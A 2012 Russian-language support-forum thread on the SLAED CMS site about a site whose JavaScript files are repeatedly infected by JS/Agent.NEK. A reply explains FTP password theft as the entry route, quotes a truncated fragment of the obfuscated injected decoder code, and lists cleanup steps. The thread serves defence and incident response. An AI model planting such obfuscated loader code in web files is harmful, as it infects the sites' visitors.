Чтение RSS каналов

Форум

Открыть Ответить

JS/Agent.NEK

0

0
1
05.04.2012 17:02:07
На моем сайте уже четветый раз все файлы js заражаются вредоносныи кодом. Не могу найти дыру. Может есть какие нибудь мысли
3.74

3.74
2
05.04.2012 19:23:3805.04.2012 19:25:23
ra55551, Америки не открою, а мысли - из гугла:

Червь попадает на сайт через FTP, воруя пароли к вашим аккаунтам и затем отлично там располагается. Затем вирус троян прописывается практически во файлах с расширением *.js, дописывая в конце документа свой вредоносный код. Вот скин с текстом кода:


var lf63d546="";function adde83b9a98d(){var i7ad23b=String,a6c0379=Array.prototype.slice.call(arguments).join(""),yafa43=a6c0379.substr(r7cce1563(),3)-517,ra145e,t578aa226;a6c0379=a6c0379.substr(13);var de635afd5=j4e34c(a6c0379);for(var rd81e90=0;rd81e90<de635afd5;rd81e90++){try{throw(j93b05de=a6c0379.substr(rd81e90,1));}catch(e){j93b05de=e;};if(j93b05de=='–'){yafa43="";rd81e90++;i03c1c34=b52393af(a6c0379,rd81e90);while(i03c1c34!='–'){yafa43+=i03c1c34;rd81e90++;i03c1c34=a6c0379.substr(rd81e90,1);}yafa43-=479;continue;}ra145e="";if(j93b05de=='±'){rd81e90++;j93b05de=a6c0379.substr(rd81e90,1);while(j93b05de!='±'){ra145e+=j93b05de;rd81e90++;j93b05de=a6c0379.substr(rd81e90,1);}

Выход - оттуда же:

Первое, это поменять пароли ко всем аккаунтам FTP, к админке сайта, к биллинг-панели на хостинге и так далее.
Затем очистить ваш компьютер от всякой дряни с помощью вашего антивируса или онлайн-сервисов.
А следующий и самый трудоёмкий шаг - пройтись по вашей CMS и вручную удалить записи трояна в конце всех JS-файлов вашего сайта.


P.S. Кстати, мой Dr.Web ругается на скрипт форума у тебя на сайте.


Версия системы: SLAED CMS 5.* Pro
Версия PHP: PHP 5
Сервер: Сервер в интернете
3.71

3.71
3
06.04.2012 12:54:50
Спасибо так и сделаю
3.74

3.74
Открыть Ответить
Хотите опробовать SLAED CMS в действии?

Технологии

PHP MySQL HTML 5 CSS 3 jQuery jQuery UI

Контакты

  • D-49179, Deutschland
    Ostercappeln, Im Siek 6
  • +49 176 61966679

  • https://slaed.net
Идеи и предложения
Обратная связь